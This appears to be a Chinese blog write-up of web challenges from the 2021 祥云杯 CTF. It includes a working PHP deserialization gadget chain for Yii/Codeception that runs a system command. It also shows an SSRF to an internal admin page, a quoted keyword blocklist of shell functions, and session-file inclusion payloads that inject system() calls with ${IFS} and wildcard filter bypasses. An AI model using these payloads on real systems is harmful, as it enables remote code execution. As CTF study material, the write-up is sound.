Life has its own fate, and meeting may not be accidental.

0%

2021-祥云杯web

部分web,太菜了有些做不出来

ezyii

参考:https://xz.aliyun.com/t/9948
不过后来第四条链子被作者删了。

代码如下:

1
<?php
2
namespace Codeception\Extension{
3
    use Faker\DefaultGenerator;
4
    use GuzzleHttp\Psr7\AppendStream;
5
    class  RunProcess{
6
        protected $output;
7
        private $processes = [];
8
        public function __construct(){
9
            $this->processes[]=new DefaultGenerator(new AppendStream());
10
            $this->output=new DefaultGenerator('jiang');
11
        }
12
    }
13
    echo base64_encode(serialize(new RunProcess()));
14
}
15
16
namespace Faker{
17
    class DefaultGenerator
18
{
19
    protected $default;
20
21
    public function __construct($default = null)
22
    {
23
        $this->default = $default;
24
}
25
}
26
}
27
namespace GuzzleHttp\Psr7{
28
    use Faker\DefaultGenerator;
29
    final class AppendStream{
30
        private $streams = [];
31
        private $seekable = true;
32
        public function __construct(){
33
            $this->streams[]=new CachingStream();
34
        }
35
    }
36
    final class CachingStream{
37
        private $remoteStream;
38
        public function __construct(){
39
            $this->remoteStream=new DefaultGenerator(false);
40
            $this->stream=new  PumpStream();
41
        }
42
    }
43
    final class PumpStream{
44
        private $source;
45
        private $size=-10;
46
        private $buffer;
47
        public function __construct(){
48
            $this->buffer=new DefaultGenerator('j');
49
            include("closure/autoload.php");
50
            $a = function(){system('cat /flag.txt');};
51
            $a = \Opis\Closure\serialize($a);
52
            $b = unserialize($a);
53
            $this->source=$b;
54
        }
55
    }
56
}

安全检测

通过POST请求发现报错,代码中使用file_get_contents,

第一时间想到了利用伪协议读取,试了好多个,发现不是被禁用了就是不行

1
POST /check2.php HTTP/1.1
2
Host: eci-2zefzyj8kapkgt0oad3m.cloudeci1.ichunqiu.com
3
4
url1=http://ss123.828.22.1/

后面进行目录扫描,发现存在admin文件夹,尝试访问admin文件夹,payload:http://127.0.0.1/admin/

admin文件夹

继续访问include123.php:http://127.0.0.1/admin/include123.php

include123.php

1
<?php
2
$u=$_GET['u'];
3
4
$pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where";
5
$pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert";
6
$pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
7
$pattern .="|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr";
8
$pattern .="|file|dict|gopher";
9
//累了累了,饮茶先
10
11
$vpattern = explode("|",$pattern);
12
13
foreach($vpattern as $value){    
14
    if (preg_match( "/$value/i", $u )){
15
        echo "检测到恶意字符";
16
        exit(0);
17
    }
18
}
19
20
include($u);
21
22
23
show_source(__FILE__);
24
?>

测试了好多个都不行,查看了下session文件包含漏洞,应该是这个。

1
常见的php-session存放位置:
2
/var/lib/php/sess_PHPSESSID
3
/var/lib/php/sess_PHPSESSID
4
/tmp/sess_PHPSESSID
5
/tmp/sessions/sess_PHPSESSID

PHPSESSID

执行下phpinfo成功。

1
payload:http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=phpinfo();?>
2
<?="xx"?>为PHP短标签,同等与<?php echo "xxx" ?>

phpinfo()

执行lS试试,这边利用了${IFS}代替了空格

1
payload:http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=system('ls${IFS}/');?>

ls${IFS}/

1
bin boot dev etc getflag.sh home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var var

发现根目录下存在getflag.sh,运行下试试,由于flag被过滤,所以这边利用fl?g来代替flag

1
payload:http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=system('.${IFS}/getfl?g.sh');?>

getflag.sh

参考

一篇文章带你理解漏洞之 PHP 文件包含漏洞
文件包含漏洞
yii 2.0.42 最新反序列化利用全集
[祥云杯2021] wp